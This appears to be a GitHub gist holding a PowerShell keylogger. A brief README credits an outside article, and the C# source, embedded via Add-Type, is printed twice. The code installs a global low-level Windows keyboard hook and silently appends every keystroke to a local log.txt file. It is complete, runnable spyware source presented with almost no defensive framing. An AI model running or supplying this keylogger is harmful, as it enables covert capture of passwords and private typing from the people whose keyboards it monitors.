sancarn/KeyLogger.ps1

## _README.MD

      
    Raw
  

              _README.MD
            
          
    KeyLogger in Powershell

Original Source: https://hinchley.net/articles/creating-a-key-logger-via-a-global-system-hook-using-powershell/
This is also very useful for running C# from PowerShell in general.

  
## KeyLogger.ps1
Add-Type -TypeDefinition @"
using System;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Windows.Forms;

namespace KeyLogger {
  public static class Program {
    private const int WH_KEYBOARD_LL = 13;
    private const int WM_KEYDOWN = 0x0100;

    private const string logFileName = "log.txt";
    private static StreamWriter logFile;

    private static HookProc hookProc = HookCallback;
    private static IntPtr hookId = IntPtr.Zero;

    public static void Main() {
      logFile = File.AppendText(logFileName);
      logFile.AutoFlush = true;

      hookId = SetHook(hookProc);
      Application.Run();
      UnhookWindowsHookEx(hookId);
    }

    private static IntPtr SetHook(HookProc hookProc) {
      IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
      return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
    }

    private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);

    private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
      if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) {
        int vkCode = Marshal.ReadInt32(lParam);
        logFile.WriteLine((Keys)vkCode);
      }

      return CallNextHookEx(hookId, nCode, wParam, lParam);
    }

    [DllImport("user32.dll")]
    private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);

    [DllImport("user32.dll")]
    private static extern bool UnhookWindowsHookEx(IntPtr hhk);

    [DllImport("user32.dll")]
    private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

    [DllImport("kernel32.dll")]
    private static extern IntPtr GetModuleHandle(string lpModuleName);
  }
}
"@ -ReferencedAssemblies System.Windows.Forms

[KeyLogger.Program]::Main();
	Add-Type -TypeDefinition @"
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Windows.Forms;

	namespace KeyLogger {
	public static class Program {
	private const int WH_KEYBOARD_LL = 13;
	private const int WM_KEYDOWN = 0x0100;

	private const string logFileName = "log.txt";
	private static StreamWriter logFile;

	private static HookProc hookProc = HookCallback;
	private static IntPtr hookId = IntPtr.Zero;

	public static void Main() {
	logFile = File.AppendText(logFileName);
	logFile.AutoFlush = true;

	hookId = SetHook(hookProc);
	Application.Run();
	UnhookWindowsHookEx(hookId);
	}

	private static IntPtr SetHook(HookProc hookProc) {
	IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName);
	return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0);
	}

	private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam);

	private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) {
	if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) {
	int vkCode = Marshal.ReadInt32(lParam);
	logFile.WriteLine((Keys)vkCode);
	}

	return CallNextHookEx(hookId, nCode, wParam, lParam);
	}

	[DllImport("user32.dll")]
	private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId);

	[DllImport("user32.dll")]
	private static extern bool UnhookWindowsHookEx(IntPtr hhk);

	[DllImport("user32.dll")]
	private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

	[DllImport("kernel32.dll")]
	private static extern IntPtr GetModuleHandle(string lpModuleName);
	}
	}
	"@ -ReferencedAssemblies System.Windows.Forms

	[KeyLogger.Program]::Main();